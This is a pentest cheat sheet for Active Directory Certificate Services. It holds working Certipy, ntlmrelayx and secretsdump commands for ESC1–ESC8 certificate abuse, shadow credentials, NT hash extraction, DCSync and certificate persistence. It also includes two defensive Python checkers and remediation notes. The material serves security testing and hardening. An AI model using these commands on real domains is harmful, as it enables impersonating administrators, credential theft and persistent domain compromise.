AD CS (Active Directory Certificate Services)
Default Ports: 80/443, 135, 445, 389/636, 88
Active Directory Certificate Services (AD CS) issues certificates in Windows domains. In pentests, AD CS misconfigurations can allow certificate-based privilege escalation, account impersonation, NTLM relay, and long-lived domain persistence.
Connect
Using Certipy
Certipy is the main AD CS enumeration and abuse tool.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -json -csv -output adcs
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
Using LDAP
AD CS objects live in the Configuration naming context, so the base DN must sit under CN=Configuration rather than the domain NC. A simple bind over ldap:// sends the password in cleartext; prefer ldaps:// (636) or -Y GSSAPI where the environment allows it.
ldapsearch -x -H ldap://dc.domain.local -D 'DOMAIN\user' -w 'Password123' \
-b 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local' \
'(objectClass=pKIEnrollmentService)'
ldapsearch -x -H ldap://dc.domain.local -D 'DOMAIN\user' -w 'Password123' \
-b 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local' \
'(objectClass=pKICertificateTemplate)'
Using Windows Tools
Native tools validate CA and template visibility from a Windows host. certreq -submit expects a request file, not the .inf, so build the request first.
certutil -config "CAHOST\CA-NAME" -ping
certutil -getconfig
certutil -template
certreq -new request.inf request.req
certreq -submit -config "CAHOST\CA-NAME" request.req
Web Enrollment
Web Enrollment is important for relay and legacy enrollment testing.
curl -I http://ca.domain.local/certsrv/
curl -I https://ca.domain.local/certsrv/
curl -I http://ca.domain.local/certsrv/certfnsh.asp
curl -I http://ca.domain.local/certsrv/mscep/mscep.dll
curl -I http://ca.domain.local/certsrv/mscep_admin/
Recon
Service Detection with Nmap
Scan CA hosts for web, RPC, LDAP, SMB, and Kerberos exposure.
nmap -p 80,443,88,135,139,389,445,464,593,636,3268,3269 -sV ca.domain.local
nmap -p 80,443 --script http-title,http-headers,http-auth ca.domain.local
nmap -p 135 --script msrpc-enum ca.domain.local
nmap -p 389 --script ldap-rootdse dc.domain.local
CA Discovery
The first goal is to identify Enterprise CAs trusted by the domain. With -output adcs Certipy writes the text report to adcs_Certipy.txt; grep the CA section of that file.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -output adcs
grep -Ei 'CA Name|DNS Name|Certificate Subject|Web Enrollment|User Specified SAN' adcs_Certipy.txt
Template Discovery
Templates define who can request certificates and what identities they can contain. The grep needs the text report, so request -text as well (the -json output is for tooling, not grep).
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -json -output adcs
grep -Ei 'Template Name|Enrollment Rights|Client Authentication|Enrollee Supplies Subject|Manager Approval' adcs_Certipy.txt
Web Endpoint Discovery
Identify /certsrv/, CES, CEP, and NDES endpoints.
ffuf -u http://ca.domain.local/FUZZ -w wordlist.txt -mc all
curl -I http://ca.domain.local/certsrv/
curl -I http://ca.domain.local/ADPolicyProvider_CEP_UsernamePassword/service.svc
curl -I http://ca.domain.local/CertSrv/mscep/mscep.dll
Enumeration
Template Permission Enumeration
Check which users or groups can enroll in each template, and who can edit it (the object-control rights behind ESC4). -enabled hides templates that no CA publishes.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -enabled -text -output adcs
grep -Ei 'Enrollment Rights|Owner|Write Owner|Write Dacl|Write Property' adcs_Certipy.txt
Vulnerable Template Enumeration
Use Certipy to highlight ESC-style template issues. -vulnerable filters to findings only, and each finding in the text report carries a [!] Vulnerabilities section explaining which condition triggered it.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -text -output vulnerable-adcs
cat vulnerable-adcs_Certipy.txt
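The conditions behind ESC1, ESC2, ESC3 and ESC6 are simple enough to re-check yourself against the JSON report, which helps when you want to grade findings by who can actually enroll rather than trust the vulnerable flag alone. The script below is an added example, not code from this page or from the Certipy project; it assumes the JSON field names mirror the text-report names grepped above (the nesting under Permissions is an assumption) and runs on a constructed sample instead of a real find run.

```python
"""Re-check Certipy find output for ESC1/ESC2/ESC3/ESC6 conditions (added example)."""
import json

# Constructed sample in the shape of Certipy's JSON report. Field names mirror
# the text output; the exact nesting is an assumption made for this example.
SAMPLE_FIND = {
    "Certificate Authorities": {
        "0": {
            "CA Name": "CA-NAME",
            "DNS Name": "ca.domain.local",
            "Web Enrollment": "Enabled",
            "User Specified SAN": "Disabled",
        }
    },
    "Certificate Templates": {
        "0": {  # classic ESC1 shape
            "Template Name": "VulnerableTemplate",
            "Enabled": True,
            "Client Authentication": True,
            "Enrollee Supplies Subject": True,
            "Requires Manager Approval": False,
            "Authorized Signatures Required": 0,
            "Extended Key Usage": ["Client Authentication"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["DOMAIN.LOCAL\\Domain Users"]}},
        },
        "1": {  # ESC2: Any Purpose EKU
            "Template Name": "AnyPurposeTemplate",
            "Enabled": True,
            "Client Authentication": True,
            "Enrollee Supplies Subject": False,
            "Requires Manager Approval": False,
            "Authorized Signatures Required": 0,
            "Extended Key Usage": ["Any Purpose"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["DOMAIN.LOCAL\\Domain Users"]}},
        },
        "2": {  # ESC3: Certificate Request Agent EKU
            "Template Name": "EnrollmentAgentTemplate",
            "Enabled": True,
            "Client Authentication": False,
            "Enrollee Supplies Subject": False,
            "Requires Manager Approval": False,
            "Authorized Signatures Required": 0,
            "Extended Key Usage": ["Certificate Request Agent"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["DOMAIN.LOCAL\\Domain Computers"]}},
        },
        "3": {  # default-looking User template: only dangerous if the CA allows SAN (ESC6)
            "Template Name": "User",
            "Enabled": True,
            "Client Authentication": True,
            "Enrollee Supplies Subject": False,
            "Requires Manager Approval": False,
            "Authorized Signatures Required": 0,
            "Extended Key Usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["DOMAIN.LOCAL\\Domain Users"]}},
        },
        "4": {  # ESC1 shape, but manager approval gates issuance
            "Template Name": "ApprovedSAN",
            "Enabled": True,
            "Client Authentication": True,
            "Enrollee Supplies Subject": True,
            "Requires Manager Approval": True,
            "Authorized Signatures Required": 0,
            "Extended Key Usage": ["Client Authentication"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["DOMAIN.LOCAL\\Domain Users"]}},
        },
    },
}

# Catch-all groups; extend with broad custom groups from the target domain.
LOW_PRIV_GROUPS = {"domain users", "domain computers", "authenticated users", "everyone"}


def low_priv_can_enroll(template):
    """True if a catch-all group appears in the template's enrollment rights."""
    rights = (template.get("Permissions", {})
              .get("Enrollment Permissions", {})
              .get("Enrollment Rights", []))
    return any(r.rsplit("\\", 1)[-1].lower() in LOW_PRIV_GROUPS for r in rights)


def ungated(template):
    """No manager approval and no co-signatures between request and issuance."""
    return (not template.get("Requires Manager Approval")
            and not template.get("Authorized Signatures Required"))


def classify(find_output):
    """Return sorted (template, ESC) pairs for enabled, low-priv-enrollable, ungated templates."""
    ca_san = any(ca.get("User Specified SAN") == "Enabled"
                 for ca in find_output.get("Certificate Authorities", {}).values())
    findings = []
    for tpl in find_output.get("Certificate Templates", {}).values():
        if not (tpl.get("Enabled") and low_priv_can_enroll(tpl) and ungated(tpl)):
            continue
        name = tpl["Template Name"]
        ekus = tpl.get("Extended Key Usage", [])
        client_auth = tpl.get("Client Authentication", False)
        if client_auth and tpl.get("Enrollee Supplies Subject"):
            findings.append((name, "ESC1"))   # requester picks the SAN identity
        if "Any Purpose" in ekus or not ekus:
            findings.append((name, "ESC2"))   # Any Purpose or no EKU at all
        if "Certificate Request Agent" in ekus:
            findings.append((name, "ESC3"))   # can enroll on behalf of others
        if client_auth and ca_san:
            findings.append((name, "ESC6"))   # CA-wide SAN flag makes any auth template usable
    return sorted(findings)


def classify_file(path):
    """Classify a real report, e.g. adcs_Certipy.json from certipy find -json -output adcs."""
    with open(path) as fh:
        return classify(json.load(fh))


if __name__ == "__main__":
    for name, esc in classify(SAMPLE_FIND):
        print(f"{esc}: {name}")
```

Treat this as a cross-check on Certipy's own vulnerable flag rather than a replacement: the point of owning the rules is that you can add the environment's own broad groups to LOW_PRIV_GROUPS and see which templates become reachable.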
Web Enrollment Enumeration
Check whether web enrollment requires NTLM and whether HTTPS is enforced.
curl -I http://ca.domain.local/certsrv/
curl -I --ntlm -u 'DOMAIN\user:Password123' http://ca.domain.local/certsrv/
nmap -p 80,443 --script http-ntlm-info ca.domain.local
CA Configuration Enumeration
CA settings affect approval, request handling, and web enrollment risk.
certutil -config "CAHOST\CA-NAME" -getreg CA
certutil -config "CAHOST\CA-NAME" -getreg policy
certutil -config "CAHOST\CA-NAME" -catemplates
Attack Vectors
ESC1 User-Supplied SAN
A template is ESC1 when low-privileged principals can enroll, it carries a client-authentication EKU, Enrollee Supplies Subject is set, and no manager approval or authorized signatures are required. Certipy saves the result as administrator.pfx. On DCs enforcing strong certificate mapping (KB5014754), also pass -sid with the target account's SID so the certificate maps to the account.
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template VulnerableTemplate -upn administrator@domain.local -dc-ip 10.0.0.10
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
ESC2 Any Purpose Template
Certificates from an Any Purpose EKU template authenticate directly. Certificates from a template with no EKU at all cannot be used for Kerberos authentication on their own, but they can stand in for an enrollment agent certificate in the ESC3 on-behalf-of flow.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template AnyPurposeTemplate -dc-ip 10.0.0.10
ESC3 Enrollment Agent
A template with the Certificate Request Agent EKU lets the holder request certificates on behalf of other users from a second template that permits agent requests. Certipy saves the first certificate as user.pfx and feeds it back with -pfx.
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template EnrollmentAgentTemplate -dc-ip 10.0.0.10
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template UserTemplate -on-behalf-of domain\\administrator -pfx user.pfx -dc-ip 10.0.0.10
ESC4 Template ACL Abuse
Write permissions (WriteDacl, WriteOwner, WriteProperty) on a template let you rewrite it into an ESC1 template. certipy template does that; -save-old writes the original configuration to TemplateName.json so it can be restored afterwards with -configuration TemplateName.json. Re-run the vulnerable scan, then enroll as in ESC1.
certipy template -u user@domain.local -p 'Password123' -template TemplateName -save-old -dc-ip 10.0.0.10
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
ESC6 CA SAN Flag
EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000) in the CA's policy EditFlags lets any requester add a SAN to any template, so a plain User certificate can carry an administrator UPN; Certipy reports it as User Specified SAN: Enabled. Expect this to fail against CAs and DCs patched with KB5014754, which embed and check the requester's SID.
certutil -config "CAHOST\CA-NAME" -getreg policy\EditFlags
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template User -upn administrator@domain.local -dc-ip 10.0.0.10
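A worked check for the bit the certutil query above prints, as an added example that is not from this page or from Microsoft's tooling: it parses a constructed certutil -getreg sample (the exact "EditFlags REG_DWORD = hex (dec)" line layout is an assumption), tests the 0x40000 bit, and computes the value that clearing the flag would leave. Real values differ per CA.

```python
"""Check a CA's policy EditFlags for EDITF_ATTRIBUTESUBJECTALTNAME2 / ESC6 (added example)."""
import re

EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

# Constructed sample of: certutil -config "CAHOST\CA-NAME" -getreg policy\EditFlags
# The line layout is an assumption based on how certutil prints DWORD values;
# the EDITF_* names and bit values are the real policy-module flags.
SAMPLE_GETREG = r"""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

_EDITFLAGS_RE = re.compile(r"EditFlags\s+REG_DWORD\s*=\s*([0-9A-Fa-f]+)")


def parse_edit_flags(getreg_output):
    """Extract the raw EditFlags DWORD; certutil prints the hex form first."""
    m = _EDITFLAGS_RE.search(getreg_output)
    if m is None:
        raise ValueError("no EditFlags REG_DWORD line in certutil output")
    return int(m.group(1), 16)


def san_flag_set(flags):
    """True when the CA accepts a requester-supplied SAN on every template (ESC6)."""
    return bool(flags & EDITF_ATTRIBUTESUBJECTALTNAME2)


def hardened_edit_flags(flags):
    """EditFlags after clearing the SAN bit, which is what
    certutil -setreg policy\\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 leaves behind."""
    return flags & ~EDITF_ATTRIBUTESUBJECTALTNAME2


def assess(getreg_output):
    """Summarise one CA's EditFlags for the report."""
    flags = parse_edit_flags(getreg_output)
    return {
        "edit_flags": flags,
        "esc6": san_flag_set(flags),
        "hardened": hardened_edit_flags(flags),
    }


if __name__ == "__main__":
    result = assess(SAMPLE_GETREG)
    print(f"EditFlags=0x{result['edit_flags']:x} ESC6={result['esc6']} "
          f"hardened=0x{result['hardened']:x}")
```

To remediate, clear the bit with certutil -config "CAHOST\CA-NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, restart the CertSvc service, and re-run the getreg query to confirm the SAN line is gone.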
ESC8 NTLM Relay to Web Enrollment
HTTP enrollment endpoints that accept NTLM can be relay targets. The relay only yields a useful certificate when a privileged machine authenticates to the listener, so pair it with a coercion primitive (PetitPotam, printerbug) aimed at a DC, and remember that a CA hosted on the DC itself cannot be used to relay that DC's own authentication back to it. Newer Certipy releases take the target as -target http://ca.domain.local instead of -ca; check certipy relay -h for the installed version.
certipy relay -ca ca.domain.local -template DomainController
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
Shadow Credentials
Shadow credentials are not a template issue: with write access to a target's msDS-KeyCredentialLink you register your own key on the account, then authenticate with PKINIT, which needs at least one DC holding a valid DC certificate. certipy shadow auto performs add, auth, and cleanup in one step and prints the NT hash; the add form below leaves the key in place for persistence.
certipy shadow add -u user@domain.local -p 'Password123' -account targetuser -dc-ip 10.0.0.10
certipy auth -pfx targetuser.pfx -dc-ip 10.0.0.10
Post-Exploitation
Certificate Authentication
Use issued certificates to request TGTs or authenticate as the target account.
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
export KRB5CCNAME=administrator.ccache
NT Hash Extraction
certipy auth authenticates with PKINIT, then uses U2U to recover the account's NT hash from the ticket and saves a ccache. Point Impacket at that ccache for DCSync.
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@dc.domain.local
Persistence Review
Issued certificates stay valid after the account's password changes, until they expire or are revoked, so record validity dates and SAN identities for the report. certipy cert has no info flag; export the certificate and inspect it with openssl or certutil.
certipy cert -pfx administrator.pfx -nokey -out administrator.crt
openssl x509 -in administrator.crt -noout -text
certutil -dump administrator.pfx
Evidence Collection
Save CA, template, and vulnerable finding outputs.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -json -csv -output adcs-evidence
Useful Tools
| Tool | Purpose |
|---|---|
| certipy | AD CS enumeration and abuse |
| certutil | Native Windows CA checks |
| certreq | Native certificate requests |
| ldapsearch | LDAP enumeration |
| nmap | Service and endpoint checks |
| ntlmrelayx.py | NTLM relay to AD CS |
| openssl | Certificate inspection |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| User-supplied SAN with client auth | Account impersonation |
| Broad enrollment rights | Low-privilege certificate abuse |
| Weak template ACLs | Template takeover |
| Enrollment Agent abuse | Request certificates for other users |
| NTLM Web Enrollment | Relay to certificate issuance |
| Dangerous CA flags | CA-wide impersonation paths |
| Missing manager approval | Automated certificate abuse |
| Long certificate validity | Long-lived persistence |
| Weak monitoring | Certificate abuse is harder to detect |